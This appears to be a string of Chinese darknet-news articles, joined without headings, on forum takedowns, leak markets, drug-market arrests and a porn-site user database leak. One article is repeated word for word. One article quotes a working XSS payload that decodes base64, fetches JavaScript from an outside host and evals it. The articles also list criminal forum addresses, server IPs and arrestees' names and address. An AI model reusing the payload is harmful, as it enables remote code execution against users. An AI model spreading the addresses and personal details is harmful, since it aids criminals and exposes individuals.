本月初,“暗网下/AWX”曾报道,两个版本BreachForums论坛的多个明网域名遭执法机构查封。本月中旬,由Indra运营的暗网数据泄露论坛BreachForums遭遇了长期停机,明网网站无法正常访问,暗网网站提示“Onion site not found”。前端仍正常运行,但后端已无响应,基本可以确定其背后的基础设施出现了问题,而非黑客攻击或计划内维护。
虽然BreachForums管理层表示这只是例行维护,但据威胁情报专家猜测,可能有两项协同行动针对该论坛:一是由LAPSUS$与HasanBroker共同宣布的“Operation Lebensraum”联盟,明确以“抹除Indra及其BreachForums论坛”为目标;二是“网络反情报威胁调查联盟”(CCITIC),一家调查网络威胁以协助当局的非营利组织,该组织声称是他们攻击了Indra的BreachForums。
经“暗网下/AWX”长期坚持跟进与持续跟踪报道,可以看到BreachForums数据泄露论坛有着混乱的黑暗历史:多次遭FBI查封(2023–2025年)、大规模数据泄露(2026年1月有32.4万用户信息曝光)、疑似蜜罐的重新启动、多次域名被查封后重新启用新域名……自2022年以来,BreachForums历经多次FBI查封仍存活至今,每次被关停后都会更换顶级域名(.st ➡️ .cx ➡️ .is ➡️ .vc ➡️ .hn ➡️ .as…)。
这次不管是谁的努力,瘫痪了Indra的BreachForums论坛,则为其竞争对手HasanBroker版本的BreachForums论坛铺平了道路,该版本自诩为合法继承者,且正获得越来越多的支持。
“暗网下/AWX”继续追踪分析后基本确认,Indra版本BreachForums的关闭,既非黑客攻击,也非例行维护——而是被强制下线。网络反情报威胁调查联盟(CCITIC)成功关闭了Indra的BreachForums论坛,Indra被迫发布一则告别公告,但该公告目前已经不可见。
Indra的BreachForums论坛在CCITIC的持续努力与施压下关闭 根据CCITIC官网的介绍:
网络反情报威胁调查联盟(Cyber Counter-Intelligence Threat Investigation Consortium)是当今互联互通的数字环境中,抵御不断演变的网络威胁的一座协作堡垒。
本组织汇聚了网络安全专家、研究人员和分析师,共同构建统一的防御网络。依托自主研发的平台和集体智慧,我们在威胁危及关键基础设施之前,便能对其进行识别、分析并予以消除。
CCITIC宣告, BreachForums.as已下线——CCITIC成功将其击溃。其在领英上发文称,该域名breachforums[.]as是这个臭名昭著的网络犯罪论坛在明网上的最新版本,目前无法访问。这不是系统故障,而是被强制下线。
CCITIC表示,他们已成功定位到BreachForums背后的上游服务器,这些服务器均托管于DigitalOcean(ASN 14061)位于法兰克福数据中心的机房。随后,该组织提交了多份滥用报告(由于DigitalOcean要求每个 IP 地址提交一份报告,因此不得不提交了三份完全相同的报告),美国云服务提供商DigitalOcean终止了对这些服务器的服务。
🖥️ 已确认的服务器IP:
🔹 164.90.223.186 — 与 breachforums.as 域名直接关联
🔹 138.68.73.155
🔹 68.183.223.214
CCITIC于2026年3月6日扫描时,确定这些服务器拥有相同的技术指纹:WSGIServer/0.2、CPython/3.12.12、端口 3093、TLS 1.3。
2026年3月12日,CCITIC向DigitalOcean安全运营中心提交了滥用报告后,该托管服务商审查了CCITIC的报告,并对与BreachForums基础设施(breachforums[.]as)相关的账户采取了行动。
Indra发表告别信后选择转移资金退出 随后,访问Indra的BreachForums论坛,跳转至:https://breachforums[.]as/info/download.php,并显示一封告别公告:
亲爱的世界,
是时候向大家告别了——尽管并非彻底的告别。
BreachForums 早已不仅仅是一个平台;它是一个社区,在许多方面,更是一项你们每个人都理解并为此贡献力量的共同使命。
在过去的几个月里,我竭尽所能帮助这个社区重振旗鼓并日益壮大,我坚信这里所建立的一切将会继续存在并不断发展。
然而,此刻我必须退居二线。我个人生活中一些重要且迫切的事务需要我投入精力,其中包括一项新事业的启动。尽管如此,只要条件允许,我仍会尽我所能继续支持 BreachForums。
因此,我们现正寻找一位负责任的个人或团队,接手论坛的领导工作并提供持续支持。
现任版主团队将保持不变,并继续履行其一贯职责:Loki、Tanaka、888 和 Pine。
我们期待就论坛的未来展开严肃而认真的讨论。
如有兴趣,请通过以下渠道联系管理团队:
Session: 054d67e476285098efb2bbe770d205588b6639c5af9157edf138b630cd53109723
TOX:D1E8EB300080486048B366464BD5D57C86D6FA8234E784714541BAEAFB64FC6A7CCD72D7F819
— BreachForums 管理团队
Russian Market是当今地下网络犯罪生态中最具持久性和影响力的平台之一,主要从事被盗凭证、信用卡数据(CVV)以及信息窃取恶意软件(infostealer)日志的交易。该平台自2019年左右开始运营,据称有俄罗斯政府背景,尽管名称中带有“Russian”,但该网站使用英语界面,面向全球用户。截至2026年3月,根据多家网络安全机构的监测报告(如Breachsense、CloudSek、SOCRadar、Rapid7等),Russian Market仍是stolencredentials和stealerlogs的主导市场之一,库存规模庞大,在售窃取日志超过1060万条,信用卡数据超过850万张。
与“暗网下/AWX”多次报道的其他曾被执法部门重创的平台(如Genesis Market于2023年被查封、导致Russian Market交易量激增670%;被查封的RaidForums/BreachForums、XSS等)相比,Russian Market表现出极强的韧性,未遭受平台级取缔,持续活跃。
平台运作模式与商品演变 Russian Market采用“自动商店”(autoshops)模式,类似于正规电商网站:商品分类清晰、可搜索、支持即时购买,买卖双方无需直接接触。这种低摩擦设计大幅降低了网络犯罪的准入门槛。
Russian Market平台的产品线经历了清晰的演变:
2019–2024年初:初期专注于远程桌面协议(RDP)访问权限销售。此类权限常被用于部署勒索软件、进行网络间谍活动,或作为进一步攻击的跳板。RDP访问已高度商品化,直至2024年1月该服务正式终止,不再提供。
2021年起:信用卡数据(CVV)业务迅速崛起,成为当时的主要品类之一,凭借扩张策略和较低的执法压力,一度领先同类平台。
2021年末至今:转向以信息窃取日志(stealerlogs,或称“僵尸程序”/bots)为主导。这些日志是由infostealer恶意软件从受害者设备中提取的数据包,通常包含:
保存的用户名、密码 浏览器会话cookie(可直接用于账户接管,绕过多因素认证) 自动填充数据、系统信息、加密钱包凭证等 2025年上半年,平台每月平均出售约3万个此类日志,上半年累计超过18万条公开出售。当前在售日志数量已达约1060万条,远超竞争对手(如2Easy仅为其约14%;Genesis Market关闭时仅有约42.5万个)。
主要商品详情与统计 信息窃取日志:平台最核心商品。买家可按地理位置、国家、操作系统、所用窃取工具类型、供应商、特定域名或邮箱等条件筛选。每个日志平均售价约10美元(历史价格范围1–100美元,取决于地理位置、数据质量、凭证有效性等)。日志大小通常为0.05–0.3MB,平均0.14MB,常包含多个域名的凭证。
主流窃取工具变种:Lumma Stealer曾占据主导地位(一度约66%,2024年Q4甚至达92%),但受2025年5月全球域名查封影响份额下降;Rhadamanthys(约5%)、Acreed等新兴变种崛起。早期流行的RedLine、Raccoon等因开发者被捕(RedLine2024年、Raccoon2022年相关行动),份额降至不足1%。 地理分布:美国受害者占比最高(约26%),其次阿根廷(23%)、巴西等。 部分数据存在质量问题,如重复、非唯一凭证,或虚假条目([email protected]等),但整体供应量巨大。 信用卡数据:销量第二大品类,在售约850万张。前20发卡国中,美国银行卡占比高达84%(约716.7万张)。
辅助工具:平台集成BIN验证器(根据卡号前6–8位查询卡片信息,用于筛选高价值目标);Netscape到JSONCookie转换器(将窃取的cookie转为现代浏览器兼容格式,便于实现会话劫持)。
卖家体系与生态特征 卖家采用积分评级体系,基于销量、买家反馈等计算分数。“钻石”级需超过10,000分,最高卖家分数可达20万以上。截至分析时,“窃取日志”板块仅列出约39家供应商,“信用卡”板块约557家,但许多供应商无实际商品上架。
参与者圈子相对封闭,每年仅新增一两个主要玩家。窃取工具变种也多出自同一小群体。尽管执法行动频繁,核心运营者和活跃卖家持续存在。
执法行动及其影响 自2022年以来,国际执法针对infostealer生态的打击显著加强:
2024年12月:Raccoon Stealer MaaS运营者Mark Sokolovsky被判5年监禁,导致该变种日志份额骤降。 2025年5月:微软、美国司法部、欧洲刑警组织等联合查封Lumma Stealer约2300个域名,基础设施遭受重创。 2025年11月:Operation Endgame行动关闭Rhadamanthys在226个国家/地区的超过1025台服务器,但运营者未公开被捕。 尽管如此,Russian Market平台本身未被整体取缔。竞争对手崩盘后用户迁移、平台的低调运营和快速适应能力,使其在2026年仍被多家报告视为stolencredentials和stealerlogs的主要枢纽。
风险与防御建议 Russian Market已成为凭证滥用攻击链的核心节点:企业员工设备感染infostealer→数据打包出售→买家购买用于初始访问、横向移动、勒索软件部署或账户接管。许多重大数据泄露事件最终可追溯至此类平台购买的凭证。
Russian Market的持续存在凸显了地下凭证经济的规模与韧性。其海量、低价供应降低了攻击门槛,对全球网络安全构成持久威胁。及时监控和强化身份防护,是有效降低风险的关键。
对于企业和个人,“暗网下/AWX”建议采取进一步防御措施加强防范,包括:
启用多因素身份验证(MFA),优先采用基于App或硬件密钥的方式(减少cookie劫持风险)。 使用唯一强密码,并借助密码管理器管理。 加强终端防护,部署端点检测与响应(EDR)工具,监控异常行为。 定期监测暗网暴露情报,检查组织域名、邮箱是否出现在此类平台。 开展员工安全意识培训,防范钓鱼邮件、恶意下载等感染途径。
2023年底,瑞典警方在一个小镇查获了两部手机,在分析手机数据后,警方发现了一个涉嫌贩运大量毒品的国际犯罪网络。分析人员随后发现的数据指向一个与毒品走私、洗钱和网络分销相关的全球网络,该网络主要集中在北欧国家,与历史最悠久的暗网毒品市场“Archetyp Market”密切相关。
去年6月,“暗网下/AWX”曾报道,在欧洲刑警组织和欧洲司法组织的支持下,德国、荷兰、罗马尼亚、西班牙和瑞典等六国采取了一系列大规模协同执法行动,共同捣毁了暗网毒品市场“Archetyp Market”。当时,在面临国际刑警组织的通缉令时,“Archetyp Market”的部分版主和管理员离开了欧洲。
近日,欧洲司法组织宣布,在欧洲司法组织(Eurojust)和欧洲刑警组织(Europol)的协调下,全球各地执法部门又采取后续行动导致15名嫌疑人被逮捕,一个组织严密的贩毒网络被捣毁。来自四个国家的执法部门携手合作,对这个活跃于全球的庞大犯罪网络采取了严厉打击措施。
分析的数据显示,贩毒和洗钱活动并非由单一犯罪团伙所为,而是一个由多个犯罪团伙通过错综复杂的公司网络相互连接而成的犯罪网络。该网络在泰国的成员运营着一个针对北欧客户的大规模线上毒品分销网络。在瑞典,成员们负责管理国内毒品分销并洗钱。在西班牙,一名高价值目标人物正在协助进行大规模毒品贩运。而该犯罪网络的其他部分则与泰国、德国和澳大利亚有关联。
在对手机进行分析后,全球执法部门迫切需要携手合作,共同打击这一犯罪活动。欧洲司法组织促成了五个国家的司法部门会面、信息共享和战略行动计划的制定。在欧洲司法组织和欧洲刑警组织的协调下,这种高效的国际合作促成了对该犯罪网络的首次打击。德国当局查获了一批重达1.2吨、目的地为澳大利亚市场的合成毒品。随后,两名正在等待这批货物抵达的分销商在澳大利亚被确认身份并逮捕。
在确定了该网络中的关键角色后,当局制定了一项有针对性的全球行动。2026年3月4日起,在西班牙、瑞典和泰国执行了约20次搜查行动,逮捕了15名犯罪嫌疑人,并查获了价值约300万至400万欧元的资产。警方缴获了包括手机和文件在内的重要证据,这些证据将被进一步取证分析。
泰国警方配合抓获3名瑞典男子 瑞典和澳大利亚当局在情报显示嫌疑人与暗网平台有关联后,请求泰国协助。调查人员认为,这些人选择泰国是为了寻求隐私和舒适的生活方式,同时避开欧洲警方的视线,操控犯罪活动。
据泰国中央调查局(Central Investigation Bureau)称,此次逮捕行动代号为“潘多拉行动”(Operation Pandora),“潘多拉行动”的目标是那些试图通过在泰国居住来逃避本国指控的外国逃犯。
2026年3月7日,泰国警方突袭了曼谷和巴蜀府的九处地点。警方重点搜查了高档泳池别墅及其附近住宅,调查人员认为这些地点与嫌疑人的日常犯罪活动有关。
调查人员称,该团伙与一个在暗网经营毒品市场的跨国犯罪集团有关,他们利用在泰国的房产作为远程基地,协助管理与Archetyp Market和Mupparna.net相关的网站。
被捕的3名嫌疑人分别为47岁的罗伯特·米凯尔·林德(Robert Mikael Lind,在曼谷旺通朗区拉抛巷 87 号被拘留,主要原因是与签证逾期滞留有关的移民指控)、39岁的丹尼尔·李(Daniel Lee,在巴蜀府华欣地区塔泰的一处房产内被捕)和33岁的约翰·阿亚·加瓦姆扎德(John Arya Ghavamzadeh,在华欣地区被拘留)。
2026年3月8日,泰国中央调查局(CIB)局长纳塔萨克·乔瓦纳赛中将宣布了逮捕行动。他还强调,案件之所以能够取得进展,是因为各机构之间进行了跨境信息共享。
调查人员称,嫌疑人协助运营了Archetyp Market(一个长期运营的暗网市场,主要交易毒品。欧洲执法机构此前曾针对该平台采取行动,导致多名涉案人员被捕及相关物品被查扣)和Mupparna.net(与上述平台同属一个网络,同样支持匿名毒品交易)两个网站,这两个网站都与暗网上的毒品销售有关。当局声称,该网络控制了欧洲某些类型非法网络毒品交易市场 80% 以上的份额。
警方称,这些交易平台允许买卖双方使用加密货币进行匿名交易。在后台,版主和管理员负责审核卖家信息、处理纠纷和进行基本的监管。嫌疑人利用加密信息和专用设备,在泰国远程操控这些网站。在这种模式下,豪华别墅被用作临时控制中心,配备高速互联网和安全设备。
调查人员表示,租用带泳池的别墅符合高级别网络犯罪的常见作案模式。泰国的签证政策、低调的外国人聚居区以及高端租赁房产,都使得嫌疑人更容易融入当地环境,从而在网上作案。
欧洲司法组织和欧洲刑警组织协调的国际执法行动 2025年初,瑞典检察机关意识到需要开展国际协调,由此开启了通过欧洲司法组织开展的司法合作。瑞典、德国、西班牙和澳大利亚当局在海牙欧洲司法组织举行的两次会议至关重要,会议旨在交流信息并制定打击犯罪网络的战略计划。为筹备行动日,欧洲司法组织确保准备了多份欧洲调查令、欧洲逮捕令和冻结令,并分发至多个国家。行动日当天,欧洲司法组织为各国当局提供支持,协助其对行动计划进行紧急调整,并跟进法律请求的执行情况。
欧洲刑警组织提供了全面而长期的支持,这对此次行动的成功至关重要。这包括先进的分析合作和行动协调、加密货币分析等领域的专业知识、定制情报产品和报告的开发,以及用于开展复杂跨境调查行动的专项资金。通过整合这些能力,欧洲刑警组织确保了能够将地方线索转化为针对最高级别有组织犯罪的协调一致的国际行动。
随着犯罪网络日益国际化,组织结构也变得不那么僵化和等级分明,调查和起诉这些网络成员的工作也变得愈发复杂。因此,在全球范围内开展快速高效的司法合作是打击严重有组织犯罪的关键。瑞典高级检察官托芙·库尔贝里(Tove Kullberg)领导了此次调查,她就国际行动评论道:“欧洲司法组织在行动日提供的支持使一切进展顺利。我认为欧洲司法组织的支持至关重要。”
“暗网下/AWX”总结发现,最新的国际执法行动包括在西班牙、瑞典和泰国开展的搜查行动,以及此前在澳大利亚采取的行动。主要成果包括:
全球范围内共有15人被捕,其中西班牙抓获4人,瑞典抓获6人,泰国抓获3人,澳大利亚抓获2人。 泰国警方查获的资产价值超过1亿泰铢(约合300万美元),包括现金、贵重物品,泰国警方还查扣了119件电子产品,包括41部手机、10台平板电脑、11台笔记本电脑、31个数字存储设备、7台路由器。
RaidForums、BreachForums都是曾经臭名昭著的暗网数据泄露论坛,提供被盗数据发布与交易的平台。近些年,在美国联邦调查局、国际刑警组织、欧洲刑警组织等国际执法机构的努力下,几个暗网数据泄露论坛被打击了多次。
目前仍然还存在且在暗网与明网可以同时访问的暗网数据泄露论坛还剩:两个版本的BreachForums(Indra的BreachForums与Hasan的BreachForums)、BreachForums的最大竞争对手DarkForums,这些论坛除了面临竞争对手的挑战,还得面对在执法机构的查封压力。
近期,执法机构采取密集行动,查封了三个暗网数据泄露论坛的多个域名。随后这些论坛迅速响应,启用了新的明网域名。“暗网下/AWX”整理了这几个论坛的明网域名更迭记录。
Indra的BreachForums的明网域名更迭 2025年12月,在多个版本的BreachForums被执法机构摧毁后,Indra推出了新的BreachForums论坛,明网域名为breachforums[.]bf。
2026年2月4日,breachforums[.]bf域名遭受据称HasanBroker等的社会工程学攻击,被暂停解析,暂停期间,Indra的BreachForums迅速启用了新的明网域名breachforums[.]jp。后Indra设法找回了bf域名,并恢复使用了bf域名,随即jp域名被放弃使用。
2026年2月,安全研究人员多次研究出breachforums[.]bf的真实IP,分别为:95.129.233.76、185.129.102.34、31.172.87.150。
2026年2月14日,breachforums[.]bf域名再次被暂停解析,这次疑似是真被执法机构查封,并同时查封了breachforums[.]jp域名。
同日,Indra的BreachForums又一次迅速启用了新明网域名breachforums[.]as,并发布公告称,此次纯属注册商单方面暂停服务,与BreachForums内部运营无关,系统安全状态完好无损。未发生任何安全事件,未出现数据泄露,其基础设施、服务器及数据均未受影响。
Hasan的BreachForums的明网域名更迭 2026年1月,原BreachForums的管理员HasanBroker推出了另一个新的BreachForums,明网域名为breachforums[.]cz。2026年2月12日,有安全研究人员分析出该域名的子域名mail[.]breachforums[.]cz背后的真实IP为176.123.2.86。
2026年2月20日,breachforums[.]cz域名被执法机构查封,虽然依然能打开,但是访问时提示“Page could not be loaded”。在breachforums[.]cz域名被查封后,Hasan的BreachForums启用新明网域名breachforums[.]in为其主域名。
DarkForums的明网域名更迭 2025年,暗网出现一个新的数据泄露论坛DarkForums,成为BreachForums有力的竞争对手。DarkForums使用明网域名darkforums[.]st。
安全研究人员分析出了darkforums[.]st背后的IP:185.178.208.177,185.11.145.145, 185.11.145.254,185.196.9.155,85.208.156.120。
2025年12月,DarkForums启用新的明网域名darkforums[.]io,2026年1月,有安全研究者称该域名背后对应的真实IP有185.208.158.89、185.178.208.154。2026年2月4日,darkforums[.]io域名被执法机构查封,无法访问。
2026年2月4日,darkforums[.]io域名被查封后,DarkForums启用明网域名darkforums[.]me为主域名,该域名是DarkForums之前就持有的备用域名。当时DarkForums的所有者Knox发布带有PGP签名的论坛公告宣布“Official Domains – Old Mirrors Disabled”:
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
All previous domains and mirror links have been permanently disabled by the providers and are no longer active.
Please update your bookmarks. The only official addresses going forward are:
Clearnet: https://darkforums.me
Onion (Tor): http://darkfoxaqhfpxkrbt7vxns2z2u2k72sgmqbzeorupaiottw3ecm2wgyd.onion
We will announce and list any new mirrors here as they are added.
“暗网下/AWX”前期报道,臭名昭著的俄罗斯暗网论坛RAMP已经被FBI查封,RAMP曾是允许讨论勒索软件的暗网论坛,受到勒索软件团伙的欢迎。最新情报显示,RAMP的替代品已经出现,新暗网论坛的名称为“T1erOne”(也被称为TierOne、t1eron3、Tier1),可以同时通过暗网和明网进行访问。
近日,有安全研究人员club1337(@club31337)发布推文表示“Ramp已死,TierOne万岁”,并给出了新的T1erOne网站的暗网与明网域名。“暗网下/AWX”对该推文进行了核验,确认T1erOne网站的暗网与明网域名均可以访问:
T1erOne的暗网域名:jprrin6bqe3flvtpyxkt4zsmzc3u6vvn7ahgtcbul224w3xn4h3gawid[.]onion
T1erOne的明网域名:t1eron3[.]vip
Ramp is dead. Long live TierOne.https://t.co/akRDXrnJvahttps://t.co/dm8re9gWcU pic.twitter.com/pEh2aUb78M
— club1337 (@club31337) February 12, 2026 “暗网下/AWX”尝试访问T1erOne论坛,发现该网站主要提供了登录和注册功能。打开该网站,显示了一个简洁的登录界面,包括用户名、密码输入框,以及注册链接,没有复杂的交互或可见的外部资源加载。可以明确的是,与常规暗网论坛不同,新的T1erOne论坛并非使用常见的开源PHP论坛程序如phpBB、MyBB或SMF等进行搭建,可能系背后的管理员独立开发。
初步分析,T1erOne论坛采用了前后端分离的网站架构,还使用了Socket.IO技术来实现实时双向通信。其明网页面使用了Cloudflare的CDN服务,这可能为执法部门找到其背后的真实服务器IP提供便利。
T1erOne论坛注册不需要邮箱验证,但注册该网站以后,需要管理员进行认证,访问所有页面均跳转提示:
Этот форум только по закрытому входу. Чтобы попасть, надо скинуть свои другие форумные акк (Рехаб, хсс, эксплойт) или заплатить 450$ на БТЦ / XMR кошелёк. Message an admin | Напиши админу
(本论坛为私密论坛。如需访问,您必须发送您的其他论坛账号(Rehab、XSS、Exploit)或向BTC/XMR钱包支付450美元。联系管理员 | 给管理员写信。)
本站(anwangxia.com)经过对页面的解析,发现了其后端的部分API接口如下:
/api/auth/register /api/auth/login /api/public/banners/image/2 /api/auth/me /api/public/settings /api/notifications /api/messages/unread-count 安全研究人员认为T1erOne与此前RAMP的活动关联,并正在通过新的T1erOne论坛监控该组织,这表明网络犯罪分子的攻击行为不回停歇,勒索软件的侵扰仍将继续。T1erOne论坛接下来将如何发展以及会不会步RAMP后尘,“暗网下/AWX”将持续关注。
更多暗网新闻动态,请关注“暗网下/AWX”。
自从多次重启后的BreachForums论坛被FBI查封之后,暗网先后出现了两个名为BreachForums的论坛,一个是Indra的BreachForums[.]bf(管理员Indra与N/A),一个是Hasan的BreachForums[.]cz(管理员HasanBroker与breach3d)。这两个论坛的诞生注定会硝烟四起,BreachForums克隆论坛之间的一场战役正在打响。
“暗网下/AWX”此前跟踪报道,Indra的BreachForums[.]bf于2025年12月诞生,使用MyBB搭建,通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立,宣称自己才是真正的官方BF论坛;Hasan的BreachForums[.]cz于2026年1月出现,使用XenForo搭建,称自己才是正统,目前已吸引逾1400名成员加入。
近期,这两个BreachForums论坛的战争进入了白日化阶段,先是BreachForums[.]bf域名被社会工程学攻击后被暂停,其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本(XSS)漏洞攻击,整体而言,Hasan的BreachForums[.]cz略占上风。
BreachForums[.]bf域名丢失后又被找回 2月3日,BreachForums[.]bf域名突然被域名注册商暂停访问,其管理员N/A发布公告,紧急启动BreachForums[.]jp域名来替代访问。同时,Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”(拿下仿冒克隆),并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。
2月8日,访问BreachForums[.]bf,显示异常的篡改消息以及倒计时,暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容:公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。
根据暗网研究专家IntelOps(@IntelOpsV3)发布的消息,有黑客窃取某西非国家政府邮箱后,通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助,但技术援助集体成功推动其采取行动。
据称,Hasan在该域名被删除后成功注册该域名,并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息,重新夺回BreachForums[.]bf域名控制权,并发布公告恢复该域名的使用。
BreachForums[.]cz网站被篡改后快速恢复 2月5日,BreachForums[.]cz网站曾遭遇了一次跨站脚本(XSS)漏洞攻击,短暂遭到篡改,疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释,该XSS漏洞可利用性源于XenForo解析BBcode的机制,属于原生漏洞即零日漏洞。
该Payload利用JavaScript的eval函数实现Base64编码的解码功能(部分依赖混淆性安全机制)。通过atob函数解码后,得到以下在鼠标悬停时触发的JavaScript有效载荷:
(async() => {
var u = "https://breachforums.pathetic.wtf/server.php?get=payload";
var r = await fetch(u);
var t = await r.text();
eval(t);
})() Payload如下:
'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob("KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ=="))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .
近日,“暗网下/AWX”发现,知名中文成人网站海角社区发生一起大规模数据泄露事件,一名威胁行为者在DarkForums泄露了一个数据库,其中包含大约1570万条用户记录。
发布该数据库的黑客昵称是“Tanaka”,帖子名为“China – haijiao.com 15.7M User DB”。在帖子内,他介绍了数据库信息,贴上了样本数据,并给出了具体的下载地址。根据介绍,数据格式是Json格式,泄露时间是2022年,从样本分析,数据可能是从Elasticsearch导出,包含如下字段:
_id; _index; _score; avatar; cash_count; cert_professor; cert_professor_expire; cert_video; cert_video_expire; certified; certified_expire; comment_count; created_at; deleted_at; description; email; email_verified; famous; famous_weight; fans_count; favorite_user_count; forbidden_end_time; id; last_login_ip; last_login_time; nickname; parent_id; password; pay_password; phone; popularity; role; sex; status; tags; topic_count; updated_at; username; video_status; vip; vip_expires_time; voice_status
从字段看,泄露用户数据包括用户名、电子邮件地址、手机号码、密码(哈希加密)、最后登录IP与时间以及其他与帐户相关的详细信息,例如地点和兴趣。
访问下载地址,提示数据上传时间为2023-08-13 18:49:23,文件名是“15.7M-CN-haijiao.com-Chinese-Porn-Forum-UsersDB-json-2022.zip”,压缩包大小为1.47 GB,未压缩前是14.7 GB。
海角社区是一个中文成人网站,主要涉及成人视频、论坛及相关敏感内容,以泄露各种乱伦,通奸,强奸,偷拍等非自愿色情图片与视频为卖点。截至目前,该社区仍在正常运营,且用户活跃度较高。虽然是前期数据,但是数据量如此之大、免费开放下载使得这起泄露事件十分严重。“暗网下/AWX”提醒,网络犯罪分子可能会针对该数据定向钓鱼或者诈骗,请务必注意防范!
经本站(anwangxia.com)查询,网络上公开信息显示,海角社区在2022年曾发生过大规模用户数据泄露事件。截至目前,未见2025-2026年全新大规模泄露的可靠报道。据报道,2022年7月底,海角社区发生用户数据泄露事件,超过1300万用户数据泄露,泄露数据包括:用户名、手机号、邮箱、密码(MD5哈希)、IP地址等等。泄露原因可能是由于海角社区服务器配置错误或者其他安全漏洞,导致黑客可以直接连接数据库并导出所有用户数据。
“暗网下/AWX”建议海角社区用户:立即修改密码并更换邮箱、立刻检查使用相同密码的其他重要网站、警惕各类诈骗短信以及邮件联系。
近日,“暗网下/AWX”发现,知名中文成人网站海角社区发生一起大规模数据泄露事件,一名威胁行为者在DarkForums泄露了一个数据库,其中包含大约1570万条用户记录。
发布该数据库的黑客昵称是“Tanaka”,帖子名为“China – haijiao.com 15.7M User DB”。在帖子内,他介绍了数据库信息,贴上了样本数据,并给出了具体的下载地址。根据介绍,数据格式是Json格式,泄露时间是2022年,从样本分析,数据可能是从Elasticsearch导出,包含如下字段:
_id; _index; _score; avatar; cash_count; cert_professor; cert_professor_expire; cert_video; cert_video_expire; certified; certified_expire; comment_count; created_at; deleted_at; description; email; email_verified; famous; famous_weight; fans_count; favorite_user_count; forbidden_end_time; id; last_login_ip; last_login_time; nickname; parent_id; password; pay_password; phone; popularity; role; sex; status; tags; topic_count; updated_at; username; video_status; vip; vip_expires_time; voice_status
从字段看,泄露用户数据包括用户名、电子邮件地址、手机号码、密码(哈希加密)、最后登录IP与时间以及其他与帐户相关的详细信息,例如地点和兴趣。
访问下载地址,提示数据上传时间为2023-08-13 18:49:23,文件名是“15.7M-CN-haijiao.com-Chinese-Porn-Forum-UsersDB-json-2022.zip”,压缩包大小为1.47 GB,未压缩前是14.7 GB。
海角社区是一个中文成人网站,主要涉及成人视频、论坛及相关敏感内容,以泄露各种乱伦,通奸,强奸,偷拍等非自愿色情图片与视频为卖点。截至目前,该社区仍在正常运营,且用户活跃度较高。虽然是前期数据,但是数据量如此之大、免费开放下载使得这起泄露事件十分严重。“暗网下/AWX”提醒,网络犯罪分子可能会针对该数据定向钓鱼或者诈骗,请务必注意防范!
经本站(anwangxia.com)查询,网络上公开信息显示,海角社区在2022年曾发生过大规模用户数据泄露事件。截至目前,未见2025-2026年全新大规模泄露的可靠报道。据报道,2022年7月底,海角社区发生用户数据泄露事件,超过1300万用户数据泄露,泄露数据包括:用户名、手机号、邮箱、密码(MD5哈希)、IP地址等等。泄露原因可能是由于海角社区服务器配置错误或者其他安全漏洞,导致黑客可以直接连接数据库并导出所有用户数据。
“暗网下/AWX”建议海角社区用户:立即修改密码并更换邮箱、立刻检查使用相同密码的其他重要网站、警惕各类诈骗短信以及邮件联系。
根据美国司法部的新闻稿,现年30岁、来自弗吉尼亚州萨福克的拉希姆·汉密尔顿(RAHEIM HAMILTON)于周一在伊利诺伊州北区联邦地区法院认罪,为2020年代初期的一起重大网络犯罪案件画上了句号。
这名弗吉尼亚州男子与人共同创建并运营了臭名昭著的暗网交易市场——“帝国市场”(Empire Market),该暗网市场允许用户匿名买卖非法商品和服务。检方表示,该暗网市场涉及的非法商品交易额高达4.3亿美元,包括海洛因、冰毒、可卡因、假币和被盗信用卡信息。
汉密尔顿在芝加哥承认犯有联邦毒品共谋罪。根据该罪名,最低刑期为十年联邦监狱监禁,最高刑期为终身监禁。美国地区法官史蒂文·C·西格(Steven C. Seeger)将量刑听证会定于2026年6月17日举行。
被告认罪的消息由伊利诺伊州北区联邦检察官安德鲁·S·布特罗斯(Andrew S. Boutros)、联邦调查局芝加哥分局负责人道格拉斯·S·德波德斯塔(Douglas S. DePodesta)、美国邮政监察局芝加哥分局代理负责人玛丽·约翰逊(Mary Johnson)以及国土安全调查局纽约分局代理负责人迈克尔·阿方索(Michael Alfonso)共同宣布。政府方面由助理联邦检察官梅洛迪·威尔斯(Melody Wells )和安·玛丽·乌尔西尼(Ann Marie Ursini)代表。
汉密尔顿和托马斯·帕维(THOMAS PAVEY)于2018年至2020年共同拥有并运营“帝国市场”。在此期间,该暗网市场促成了超过400万笔交易,总价值超过4.3亿美元,使其成为当时最大的同类暗网市场之一。该网站提供的非法产品和服务包括管制药品、被盗或泄露的账户凭证、被盗的个人身份信息、假币和计算机黑客工具。管制药品的销售最为普遍,该网站运营期间的毒品净销售额接近3.75亿美元。两人于2024年被控犯有多项罪行,这些罪行最高可判处终身监禁。
汉密尔顿在认罪协议中承认,他和帕维设计了“帝国市场”(Empire Market)的暗网网站,旨在帮助用户逃避执法部门的侦查,并协助用户洗钱,以掩盖非法交易。汉密尔顿和帕维规定,该暗网网站上的所有交易都必须使用加密货币进行。“帝国市场”的商品按“欺诈”、“药品和化学品”、“假冒商品”和“软件和恶意软件”等类别进行分类。
